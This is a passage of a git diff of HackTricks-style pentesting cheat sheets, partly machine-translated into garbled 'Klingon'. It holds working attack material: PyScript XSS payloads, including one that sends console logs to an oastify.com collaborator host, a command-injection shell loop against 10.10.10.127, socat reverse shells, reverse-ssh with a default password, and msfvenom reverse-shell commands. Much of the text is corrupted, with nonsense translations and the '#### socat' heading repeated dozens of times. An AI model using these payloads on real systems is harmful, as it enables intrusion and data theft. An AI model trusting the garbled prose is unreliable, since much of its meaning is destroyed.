for num in range(thread_i, 100**50, threads):
|
||||
loose_comparison(queue, num)
|
||||
|
||||
def main():
|
||||
procs = []
|
||||
queue = Queue()
|
||||
threads = cpu_count() # 2
|
||||
procs = []
|
||||
queue = Queue()
|
||||
threads = cpu_count() # 2
|
||||
|
||||
for thread_i in range(threads):
|
||||
proc = Process(target=worker, args=(queue, thread_i, threads ))
|
||||
proc.daemon = True # kill all subprocess when main process exits.
|
||||
procs.append(proc)
|
||||
proc.start()
|
||||
for thread_i in range(threads):
|
||||
proc = Process(target=worker, args=(queue, thread_i, threads ))
|
||||
proc.daemon = True # kill all subprocess when main process exits.
|
||||
procs.append(proc)
|
||||
proc.start()
|
||||
|
||||
while queue.empty(): # exits when a subprocess is done
|
||||
pass
|
||||
return 0
|
||||
while queue.empty(): # exits when a subprocess is done
|
||||
pass
|
||||
return 0
|
||||
|
||||
main()
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh zero to hero</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -81,5 +74,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -16,22 +16,20 @@ Other ways to support HackTricks:
|
|||
|
||||
## PyScript Pentesting Guide
|
||||
|
||||
PyScript is a new framework developed for integrating Python into HTML so, it can be used alongside HTML. In this cheat sheet, you'll find how to use PyScript for your penetration testing purposes.
|
||||
PyScript jup'a'wI' 'e' vItlhutlh Python HTML vItlhutlh. vaj PyScript vItlhutlh, penetration testing purposes vItlhutlh.
|
||||
|
||||
### Dumping / Retrieving files from the Emscripten virtual memory filesystem:
|
||||
### Emscripten virtual memory filesystem laH 'ej DaH 'e' vItlhutlh:
|
||||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
Code:
|
||||
|
||||
```html
|
||||
<py-script>
|
||||
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
||||
out = fin.read()
|
||||
print(out)
|
||||
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
||||
out = fin.read()
|
||||
print(out)
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
|
||||
|
@ -41,18 +39,16 @@ Result:
|
|||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
Code:
|
||||
|
||||
```html
|
||||
<py-script>
|
||||
<py-script>
|
||||
x = "CyberGuy"
|
||||
if x == "CyberGuy":
|
||||
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
||||
contents = output.read()
|
||||
print(contents)
|
||||
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
||||
contents = output.read()
|
||||
print(contents)
|
||||
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
|
||||
</py-script>
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
|
||||
|
@ -60,13 +56,11 @@ Result:
|
|||
### Cross Site Scripting (Ordinary)
|
||||
|
||||
Code:
|
||||
|
||||
```python
|
||||
<py-script>
|
||||
print("<img src=x onerror='alert(document.domain)'>")
|
||||
print("<img src=x onerror='alert(document.domain)'>")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
|
||||
|
@ -74,7 +68,6 @@ Result:
|
|||
### Cross Site Scripting (Python Obfuscated)
|
||||
|
||||
Code:
|
||||
|
||||
```python
|
||||
<py-script>
|
||||
sur = "\u0027al";fur = "e";rt = "rt"
|
||||
|
@ -86,7 +79,6 @@ y = "o";m = "ner";z = "ror\u003d"
|
|||
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
|
||||
|
@ -94,13 +86,11 @@ Result:
|
|||
### Cross Site Scripting (JavaScript Obfuscation)
|
||||
|
||||
Code:
|
||||
|
||||
```html
|
||||
<py-script>
|
||||
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
||||
</py-script>
|
||||
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
|
||||
|
@ -108,14 +98,12 @@ Result:
|
|||
### DoS attack (Infinity loop)
|
||||
|
||||
Code:
|
||||
|
||||
```html
|
||||
<py-script>
|
||||
while True:
|
||||
print(" ")
|
||||
</py-script>
|
||||
<py-script>
|
||||
while True:
|
||||
print(" ")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -21,7 +21,6 @@ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=ba
|
|||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
```bash
|
||||
sudo apt-get install python3-venv
|
||||
#Now, go to the folder you want to create the virtual environment
|
||||
|
@ -40,11 +39,10 @@ is fixed running
|
|||
pip3 install wheel
|
||||
inside the virtual environment
|
||||
```
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) vIghoSlaHbe'chugh **automate workflows** je powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
|
@ -23,7 +23,6 @@ Get Access Today:
|
|||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Python Requests
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
|
@ -67,64 +66,93 @@ proxies = {}
|
|||
s = requests.Session()
|
||||
|
||||
def register(username, password):
|
||||
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
|
||||
def login(username, password):
|
||||
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
|
||||
def get_info(name):
|
||||
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
||||
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
||||
return guid
|
||||
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
||||
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
||||
return guid
|
||||
|
||||
def upload(guid, filename, data):
|
||||
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
||||
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
||||
return guid
|
||||
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
||||
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
||||
return guid
|
||||
|
||||
def json_search(guid, search_string):
|
||||
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
||||
return resp.json()
|
||||
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
||||
return resp.json()
|
||||
|
||||
def get_random_string(guid, path):
|
||||
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
||||
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
||||
```
|
||||
|
||||
## Python cmd to exploit an RCE
|
||||
|
||||
### English
|
||||
|
||||
To exploit a Remote Code Execution (RCE) vulnerability using Python, you can use the following command:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
url = "http://target.com/vulnerable_endpoint"
|
||||
payload = "__import__('os').system('command_to_execute')"
|
||||
|
||||
response = requests.get(url + "?param=" + payload)
|
||||
print(response.text)
|
||||
```
|
||||
|
||||
Replace `http://target.com/vulnerable_endpoint` with the URL of the vulnerable endpoint and `command_to_execute` with the command you want to run on the target system.
|
||||
|
||||
### Klingon
|
||||
|
||||
To exploit a Remote Code Execution (RCE) vulnerability using Python, you can use the following command:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
url = "http://target.com/vulnerable_endpoint"
|
||||
payload = "__import__('os').system('command_to_execute')"
|
||||
|
||||
response = requests.get(url + "?param=" + payload)
|
||||
print(response.text)
|
||||
```
|
||||
|
||||
Replace `http://target.com/vulnerable_endpoint` with the URL of the vulnerable endpoint and `command_to_execute` with the command you want to run on the target system.
|
||||
```python
|
||||
import requests
|
||||
import re
|
||||
from cmd import Cmd
|
||||
|
||||
class Terminal(Cmd):
|
||||
prompt = "Inject => "
|
||||
prompt = "Inject => "
|
||||
|
||||
def default(self, args):
|
||||
output = RunCmd(args)
|
||||
print(output)
|
||||
def default(self, args):
|
||||
output = RunCmd(args)
|
||||
print(output)
|
||||
|
||||
def RunCmd(cmd):
|
||||
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
||||
r = requests.post('http://10.10.10.127/select', data=data)
|
||||
page = r.text
|
||||
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
||||
if m:
|
||||
return m.group(1)
|
||||
else:
|
||||
return 1
|
||||
|
||||
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
||||
r = requests.post('http://10.10.10.127/select', data=data)
|
||||
page = r.text
|
||||
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
||||
if m:
|
||||
return m.group(1)
|
||||
else:
|
||||
return 1
|
||||
|
||||
|
||||
term = Terminal()
|
||||
term.cmdloop()
|
||||
```
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) vIghoS 'ej **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
|
@ -31,7 +31,6 @@ You should also try the **shodan** **exploit search** from [https://exploits.sho
|
|||
### Searchsploit
|
||||
|
||||
Useful to search exploits for services in **exploitdb from the console.**
|
||||
|
||||
```bash
|
||||
#Searchsploit tricks
|
||||
searchsploit "linux Kernel" #Example
|
||||
|
@ -41,17 +40,14 @@ searchsploit -p 7618[.c] #Show complete path
|
|||
searchsploit -x 7618[.c] #Open vi to inspect the exploit
|
||||
searchsploit --nmap file.xml #Search vulns inside an nmap xml result
|
||||
```
|
||||
|
||||
### Pompem
|
||||
|
||||
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits
|
||||
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) vItlhutlh is another tool to search for exploits
|
||||
|
||||
### MSF-Search
|
||||
|
||||
```bash
|
||||
msf> search platform:windows port:135 target:XP type:exploit
|
||||
```
|
||||
|
||||
### PacketStorm
|
||||
|
||||
If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com)
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -51,5 +49,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,22 +1,16 @@
|
|||
# Full TTYs
|
||||
# pIm 'ej 'oH HackTricks AWS Red Team Expert (htARTE) vItlhutlh!
|
||||
|
||||
<details>
|
||||
HackTricks Daq 'e' vItlhutlh:
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
* **tlhIngan Hol** vItlhutlh **HackTricks** **ghItlhmeH** 'ej **HackTricks PDF** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**.
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) vItlhutlh.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) vItlhutlh, **NFTs** [**opensea.io**](https://opensea.io/collection/the-peass-family) **qaStaHvIS**.
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **joq** 'ej [**telegram group**](https://t.me/peass) **joq** 'ej **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) **vItlhutlh**.
|
||||
* **HackTricks** 'ej **HackTricks Cloud** github repos **ghItlhmeH** PRs **jImej**.
|
||||
|
||||
## Full TTY
|
||||
|
||||
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
|
||||
`SHELL` **SHELL** _**/etc/shells**_ **list** **tlhIngan Hol** **ghItlhmeH** **be'**. `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported` **ghItlhmeH**. **bash** **qar** **zsh** **tlhIngan Hol** **ghItlhmeH** **be'** `bash` **chel** **shell** **ghItlhmeH**.
|
||||
|
||||
#### Python
|
||||
|
||||
|
@ -29,20 +23,213 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="info" %}
|
||||
You can get the **number** of **rows** and **columns** executing **`stty -a`**
|
||||
**tlhIngan** **Duj** **rows** **'ej** **columns** **number** **'ej** **`stty -a`** **execute** **'ej** **tlhIngan** **script** **'ej** **{% code overflow="wrap" %}**
|
||||
{% endhint %}
|
||||
|
||||
#### script
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
script /dev/null -qc /bin/bash #/dev/null is to not store anything
|
||||
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
||||
```
|
||||
{% endcode %}
|
||||
{% code %}
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
|
||||
#### socat
|
||||
```bash
|
||||
#Listener:
|
||||
socat file:`tty`,raw,echo=0 tcp-listen:4444
|
||||
|
@ -50,8 +237,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|||
#Victim:
|
||||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
|
||||
### **Spawn shells**
|
||||
### **Qa'vIn shells**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
|
@ -105,8 +291,7 @@ reverse-ssh.exe -p 4444 kali@10.0.0.2
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
|
||||
|
||||
* 'ej ReverseSSH port forwarding request vItlhutlh. 'ej, 'oH `reverse-ssh(.exe)` chaw'laHbe'lu'chugh, `letmeinbrudipls` default password log in 'e' vItlhutlh.
|
||||
```bash
|
||||
# Interactive shell access
|
||||
ssh -p 8888 127.0.0.1
|
||||
|
@ -114,15 +299,12 @@ ssh -p 8888 127.0.0.1
|
|||
# Bidirectional file transfer
|
||||
sftp -P 8888 127.0.0.1
|
||||
```
|
||||
## TTY pagh
|
||||
|
||||
## No TTY
|
||||
|
||||
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
|
||||
|
||||
ghorgh vItlhutlh **programmey Dajatlh** vaj user input cha'logh. vaj, password 'e' `sudo` laH 'e' vItlhutlh:
|
||||
```bash
|
||||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -38,22 +38,80 @@ Stay informed with the newest bug bounties launching and crucial platform update
|
|||
One can also use the `-a` to specify the architecture or the `--platform`
|
||||
|
||||
## Listing
|
||||
|
||||
```bash
|
||||
msfvenom -l payloads #Payloads
|
||||
msfvenom -l encoders #Encoders
|
||||
```
|
||||
## tlhIngan Hol
|
||||
|
||||
## Common params when creating a shellcode
|
||||
## QaStaHvIS 'e' vItlhutlh
|
||||
|
||||
### -p, --payload
|
||||
#### -p, --payload
|
||||
#### -p, --payload
|
||||
|
||||
The `-p` parameter specifies the payload to be used when creating the shellcode.
|
||||
|
||||
### -f, --format
|
||||
#### -f, --format
|
||||
#### -f, --format
|
||||
|
||||
The `-f` parameter specifies the output format of the shellcode.
|
||||
|
||||
### -e, --encoder
|
||||
#### -e, --encoder
|
||||
#### -e, --encoder
|
||||
|
||||
The `-e` parameter specifies the encoder to be used for the shellcode.
|
||||
|
||||
### -b, --bad-chars
|
||||
#### -b, --bad-chars
|
||||
#### -b, --bad-chars
|
||||
|
||||
The `-b` parameter specifies any bad characters that should be avoided in the shellcode.
|
||||
|
||||
### -i, --iterations
|
||||
#### -i, --iterations
|
||||
#### -i, --iterations
|
||||
|
||||
The `-i` parameter specifies the number of iterations to be used for encoding the shellcode.
|
||||
|
||||
### -a, --arch
|
||||
#### -a, --arch
|
||||
#### -a, --arch
|
||||
|
||||
The `-a` parameter specifies the architecture for which the shellcode is being created.
|
||||
|
||||
### -s, --space
|
||||
#### -s, --space
|
||||
#### -s, --space
|
||||
|
||||
The `-s` parameter specifies the maximum size of the shellcode.
|
||||
|
||||
### -n, --nopsled
|
||||
#### -n, --nopsled
|
||||
#### -n, --nopsled
|
||||
|
||||
The `-n` parameter specifies the size of the NOP sled to be used in the shellcode.
|
||||
|
||||
### -v, --var-name
|
||||
#### -v, --var-name
|
||||
#### -v, --var-name
|
||||
|
||||
The `-v` parameter specifies the variable name to be used for the shellcode.
|
||||
|
||||
### -x, --template
|
||||
#### -x, --template
|
||||
#### -x, --template
|
||||
|
||||
The `-x` parameter specifies the template file to be used for the shellcode.
|
||||
```bash
|
||||
-b "\x00\x0a\x0d"
|
||||
-f c
|
||||
-e x86/shikata_ga_nai -i 5
|
||||
-b "\x00\x0a\x0d"
|
||||
-f c
|
||||
-e x86/shikata_ga_nai -i 5
|
||||
EXITFUNC=thread
|
||||
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
|
||||
```
|
||||
|
||||
## **Windows**
|
||||
|
||||
### **Reverse Shell**
|
||||
|
@ -62,50 +120,70 @@ PrependSetuid=True #Use this to create a shellcode that will execute something w
|
|||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Bind Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
{% code overflow="wrap" %}### Bind Shell
|
||||
|
||||
Bind Shell is a technique used in hacking to create a shell on a target system that listens for incoming connections. This allows the attacker to gain remote access to the target system and execute commands.
|
||||
|
||||
To create a bind shell using msfvenom, you can use the following command:
|
||||
|
||||
```plaintext
|
||||
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output file>
|
||||
```
|
||||
